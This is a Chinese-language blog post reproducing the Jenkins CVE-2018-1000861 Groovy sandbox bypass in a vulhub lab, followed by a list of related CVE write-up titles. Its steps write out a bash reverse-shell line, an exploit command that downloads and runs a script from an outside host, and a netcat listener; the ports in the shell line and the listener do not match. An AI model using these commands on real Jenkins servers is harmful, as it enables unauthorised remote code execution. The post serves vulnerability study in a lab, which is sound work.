2. 程式人生 > 實用技巧 >CVE-2018-1000861復現

CVE-2018-1000861復現

阿新 發佈:2020-07-25

0x00 漏洞描述

Jenkins使用Stapler框架開發,其允許使用者通過URL PATH來呼叫一次public方法。由於這個過程沒有做限制,攻擊者可以構造一些特殊的PATH來執行一些敏感的Java方法。

通過這個漏洞,我們可以找到很多可供利用的利用鏈。其中最嚴重的就是繞過Groovy沙盒導致未授權使用者可執行任意命令:Jenkins在沙盒中執行Groovy前會先檢查指令碼是否有錯誤,檢查操作是沒有沙盒的,攻擊者可以通過Meta-Programming的方式,在檢查這個步驟時執行任意命令。

0x01 環境搭建

使用vulhub搭建漏洞環境

/vulhub-master/jenkins/CVE-2018-1000861

http://192.168.255.130:8080/

0x02 復現

此漏洞沒有回顯,直接利用orange的exp執行命令反彈shell

https://github.com/orangetw/awesome-jenkins-rce-2019

(1).在我們的web伺服器寫txt文字內容為:

bash -i >& /dev/tcp/*.*.*.*/2333 0>&1

(2).使用exp.py執行以下命令下載檔案

python exp.py http://192.168.255.130:8080/ "curl -o /tmp/1.sh http://192.168.255.1/1.txt"

(3).然後在我們接收shell的機器上監聽之前寫的埠

nc.exe-master>nc64.exe -lvvp 7777

(4).直接bash執行我們下載的指令碼

python exp.py http://192.168.255.130:8080/ "bash /tmp/1.sh"

(5).回到監聽埠的機器

成功獲取到shell

參考文章:https://www.cnblogs.com/cwkiller/p/12578924.html

相關推薦

CVE-2018-1000861復現

0x00 漏洞描述 Jenkins使用Stapler框架開發,其允許使用者通過URL PATH來呼叫一次public方法。由於這個過程沒有做限制,攻擊者可以構造一些特殊的PATH來執行一些敏感的Java方法。

記一次曲折的CVE-2018-1270復現分析

 前言  前兩天接到朋友對某個授權目標的漏掃結果,也算是初次接觸到這個漏洞,就想著順手分析一下復現一下,因為分析這個漏洞的文章也比較少,所以剛開始比較迷,進度也比較慢。

漏洞復現——weblogic任意檔案上傳(cve-2018-2894)

0X01漏洞簡介: Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。

漏洞復現-CVE-2018-8715-Appweb

0x00 實驗環境 攻擊機:Win 10 0x01 影響版本 嵌入式HTTP Web伺服器,<7.0.3版本 0x02 漏洞復現

漏洞復現-cve-2018-15473-ssh使用者列舉漏洞

0x00 實驗環境 攻擊機:Win 10 0x01 影響版本 OpenSSH 7.7前存在一個使用者名稱列舉漏洞,通過該漏洞,攻擊者可以判斷某個使用者名稱是否存在於目標主機

CVE-2018-2894)Weblogic任意檔案上傳漏洞復現

漏洞說明 Oracle 7月更新中,修復了Weblogic Web Service Test Page中一處任意檔案上傳漏洞,Weblogic管理端未授權的兩個頁面存在任意上傳jsp檔案漏洞,進而獲取伺服器許可權。

Weblogic命令執行漏洞(CVE-2018-2628)復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

一、漏洞描述 Spring Data是一個用於簡化資料庫訪問,並支援雲服務的開源框架,Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表示式注入漏洞

phpMyAdmin 4.8.1 檔案包含復現CVE-2018-12613)

環境搭建 在Windows下使用phpstudy搭建 apache版本:2.4.39 php版本:5.6.9 mysql版本:5.7.26

Gitlab CVE-2018-14364 壓縮包上傳getshell 漏洞復現分析

0x00 前言 該漏洞屬於登入後的任意檔案寫入漏洞,該漏洞可以通過寫入公鑰復現該漏洞需要注意版本問題,一開始用vulhub起的環境發現復現不了,於是到網上找了一個docker映象搭建起來才復現成功。

Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437) 復現

前言 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

F5 BIG-IP 遠端程式碼執行RCE(CVE-2020-5902)復現

漏洞簡介 F5 BIG-IP 是美國``F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

oracle 7月份更新 CVE-2020-14625 復現&利用

diff補丁 首先下載7月份補丁,與四月份對比,發現有以下不同之處 com.oracle.wls.shaded.org.apache.xalan.xsltc.trax

oracle 7月份更新CVE-2020-14645 復現&利用

簡介 該漏洞針對gadget cve-2020-2555 繞過利用。 分析 com.tangosol.util.extractor.UniversalExtractor程式碼如下

Dubbo 漏洞 CVE-2020-1948 復現+簡單修復

關注該漏洞的童鞋,應該對 Dubbo 這個架構優秀的 RPC 框架不陌生,所以直入主題

RF-14310: Arbitrary EL Evaluation | Arbitrary EL Evaluation in RichFaces | CVE-2013-2165 復現

緣起 今天給客戶做掃描,掃描器掃到一個漏洞 但這個漏洞是好久之前的,按照大佬的文章去復現,發現官方啥的都不提供下載了,而我自己java比較垃圾,就想著不復現了,直接copy個POC來用就行,但是遇到了一些問題

Redhat 7.x CVE-2018-15919 處理方法

技術標籤:基礎運維故障集錦linuxcentosredhat安全漏洞cve CVE-2018-15919 Public on 2018年8月28日

ESXI更新到6.7後CVE-2018-3646警告的處理,遮蔽告警

現象 ESXI更新到6.7之後,vcenter控制檯會預設有如下提示 esx.problem.hyperthreading.unmitigated

weblogic漏洞分析之CVE-2017-3248 & CVE-2018-2628

CVE-2017-3248 & CVE-2018-2628 後面的漏洞就是2017-3248的繞過而已,所以poc都一樣,只是使用的payload不同

CVE-2018-8715

Appweb CVE-2018-8715漏洞復現 0. 環境搭建 安裝docker: curl -s https://get.docker.com/ | sh 搭建vulhub,使用wget下載vulhub: